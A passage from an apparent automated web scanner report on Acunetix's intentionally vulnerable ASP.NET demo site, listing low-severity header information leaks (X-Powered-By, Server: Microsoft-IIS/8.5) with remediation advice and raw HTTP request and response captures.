title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	43
Solution	Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
Reference	http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
Tags	OWASP_2021_A01 WSTG-v42-INFO-08 OWASP_2017_A03
CWE Id	200
WASC Id	13
Plugin Id	10037

Low	Server Leaks Version Information via "Server" HTTP Response Header Field
Description	The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" 